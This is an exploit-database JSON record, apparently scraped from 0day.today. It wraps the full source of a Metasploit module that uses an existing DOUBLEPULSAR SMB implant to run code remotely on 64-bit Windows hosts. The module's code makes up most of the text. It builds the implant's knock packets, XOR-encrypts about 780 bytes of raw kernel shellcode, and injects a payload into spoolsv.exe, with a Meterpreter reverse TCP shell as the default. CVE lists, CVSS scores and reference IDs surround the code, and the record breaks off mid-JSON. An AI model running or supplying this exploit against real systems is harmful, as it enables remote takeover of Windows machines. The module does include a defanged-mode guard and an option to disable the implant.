"CVE-2017-0147", "CVE-2017-0144"], "immutableFields": [], "lastseen": "2021-10-18T22:17:39", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700059.PRM", "700099.PRM", "MS17-010.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704", "SMNTC-96705", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", 
"TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-18T22:17:39", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-10-18T22:17:39", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This 
module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => 
{\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable 
to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-10-19] #"}, "lastseen": "2021-10-18T22:17:39", "differentElements": ["sourceData"], "edition": 49}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "69467ee0f1222fc9fb750d229d6cdd23", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0146"], "immutableFields": [], "lastseen": "2021-10-20T08:18:11", "history": [], "viewCount": 94, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-27802"]}, {"type": 
"rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96703", "SMNTC-96706", 